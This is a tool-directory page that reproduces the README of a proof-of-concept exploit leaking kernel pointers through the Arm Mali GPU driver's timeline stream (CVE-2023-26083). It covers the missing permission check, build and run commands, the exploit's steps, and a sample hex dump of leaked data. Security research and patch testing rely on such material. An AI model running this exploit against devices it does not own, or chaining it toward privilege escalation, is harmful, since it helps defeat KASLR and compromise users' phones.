Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-26083 — CVE-2023-26083-Mali-InfoLeak-PoC | Kitploit
Tools/GitHubGitHub/noverisp3/cve-2023-26083
Vulnerability AnalysisExploitationInformation GatheringHardware & IoT SecurityLearning & EducationBinary Exploitation
GitHubnoverisp3/cve-2023-26083

CVE-2023-26083

CVE-2023-26083-Mali-InfoLeak-PoC

View Repository
124 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-26083 – Mali GPU Kernel Address Leak via Timeline Stream

This repository contains a proof-of-concept (PoC) exploit for CVE-2023-26083, a vulnerability in the Mali GPU driver (Arm Mali GPU Kernel Driver) that allows an unprivileged user to leak kernel pointers and sensitive internal information via the timeline stream (/dev/mali0).

Vulnerability Overview

The Mali GPU driver provides a “timeline stream” (tlstream) feature for profiling and debugging. This stream exports events that contain raw kernel pointers (e.g., addresses of kbase_context, kbase_gpu, kbase_lpu, address spaces, atoms, etc.). Normally, access to this stream should require the BASE_CONTEXT_CREATE_FLAG_MONITOR flag. However, due to a missing permission check in the KBASE_IOCTL_TLSTREAM_ACQUIRE handler, any process (even without the monitor flag) can obtain a file descriptor to the timeline stream and read kernel memory addresses.

Impact:

  • Leaking kernel pointers defeats kernel ASLR (KASLR).
  • Combined with other vulnerabilities (e.g., use-after-free, arbitrary write), this can lead to privilege escalation or arbitrary kernel code execution.
  • The leak itself exposes internal driver state and can be used for fingerprinting.

Affected Versions

  • Arm Mali GPU Kernel Driver versions prior to the fix for CVE-2023-26083.

Build & Run

Prerequisites

  • A device with a Mali GPU (e.g., Exynos, MediaTek, some Rockchip SoCs).
  • Root access is not required – the PoC works as an unprivileged user.
  • The kernel must have the Mali driver built-in or as a module (/dev/mali0 must exist).

Compilation

Since the code is self-contained and standalone, you can easily cross-compile it using standard tools.

1. For Android (Recommended)

Use the Android NDK toolchain to compile for ARM64 devices. It is highly recommended to use static linking to prevent dynamic linker compatibility issues on different Android versions:

aarch64-linux-android21-clang -static -o mali_tlstream_leak mali_tlstream_leak.c

2. For ARM-based Linux Desktops/Boards

If you are testing on an ARM development board (like Raspberry Pi or Odroid) that has a Mali GPU and runs a standard Linux distro:

gcc -static -o mali_tlstream_leak mali_tlstream_leak.c

Execution

./mali_tlstream_leak

The program will:

  1. Open /dev/mali0.
  2. Perform a version check.
  3. Set flags to BASE_CONTEXT_CREATE_FLAG_NONE (no monitor privilege).
  4. Acquire the timeline stream (vulnerable ioctl).
  5. Read timeline packets for a few seconds.
  6. Parse and display kernel pointer leaks (marked with *** KERNEL).

Example Output

Note: This Proof-of-Concept (PoC) was tested only on a Samsung Galaxy J7 Prime running Android 8.1.0 (Kernel 3.18) with the April 1, 2020 security patch level.

on7xelte:/data/local/tmp $ ./mali_tlstream_leak
Version: major=11 minor=5
SET_FLAGS ok
TLSTREAM_ACQUIRE ok, tlfd=4
Read 3805 bytes from tlstream (total=3805)

Raw hex dump (3805 bytes):

0000: 01 00 00 04 e1 0a 00 00 03 08 20 00 00 00 00 00
0010: 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c 5f 4e
0020: 45 57 5f 43 54 58 00 16 00 00 00 6f 62 6a 65 63
0030: 74 20 63 74 78 20 69 73 20 63 72 65 61 74 65 64
0040: 00 05 00 00 00 40 70 49 49 00 10 00 00 00 63 74
0050: 78 2c 63 74 78 5f 6e 72 2c 74 67 69 64 00 01 00
0060: 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c 5f 4e
0070: 45 57 5f 47 50 55 00 16 00 00 00 6f 62 6a 65 63
0080: 74 20 67 70 75 20 69 73 20 63 72 65 61 74 65 64
0090: 00 05 00 00 00 40 70 49 49 00 16 00 00 00 67 70
00a0: 75 2c 67 70 75 5f 69 64 2c 63 6f 72 65 5f 63 6f
00b0: 75 6e 74 00 02 00 00 00 11 00 00 00 4b 42 41 53
00c0: 45 5f 54 4c 5f 4e 45 57 5f 4c 50 55 00 16 00 00
00d0: 00 6f 62 6a 65 63 74 20 6c 70 75 20 69 73 20 63
00e0: 72 65 61 74 65 64 00 05 00 00 00 40 70 49 49 00
00f0: 12 00 00 00 6c 70 75 2c 6c 70 75 5f 6e 72 2c 6c
0100: 70 75 5f 66 6e 00 03 00 00 00 12 00 00 00 4b 42
0110: 41 53 45 5f 54 4c 5f 4e 45 57 5f 41 54 4f 4d 00
0120: 17 00 00 00 6f 62 6a 65 63 74 20 61 74 6f 6d 20
0130: 69 73 20 63 72 65 61 74 65 64 00 04 00 00 00 40
0140: 70 49 00 0d 00 00 00 61 74 6f 6d 2c 61 74 6f 6d
0150: 5f 6e 72 00 04 00 00 00 10 00 00 00 4b 42 41 53
0160: 45 5f 54 4c 5f 4e 45 57 5f 41 53 00 20 00 00 00
0170: 61 64 64 72 65 73 73 20 73 70 61 63 65 20 6f 62
0180: 6a 65 63 74 20 69 73 20 63 72 65 61 74 65 64 00
0190: 04 00 00 00 40 70 49 00 14 00 00 00 61 64 64 72
01a0: 65 73 73 5f 73 70 61 63 65 2c 61 73 5f 6e 72 00
01b0: 05 00 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c
01c0: 5f 44 45 4c 5f 43 54 58 00 15 00 00 00 63 6f 6e
01d0: 74 65 78 74 20 69 73 20 64 65 73 74 72 6f 79 65
01e0: 64 00 03 00 00 00 40 70 00 04 00 00 00 63 74 78
01f0: 00 06 00 00 00 12 00 00 00 4b 42 41 53 45 5f 54

Parsing packets:

Packet at offset 0: family=TL class=OBJ type=HEADER stream=1 len=2785 numbered=0
Download Tool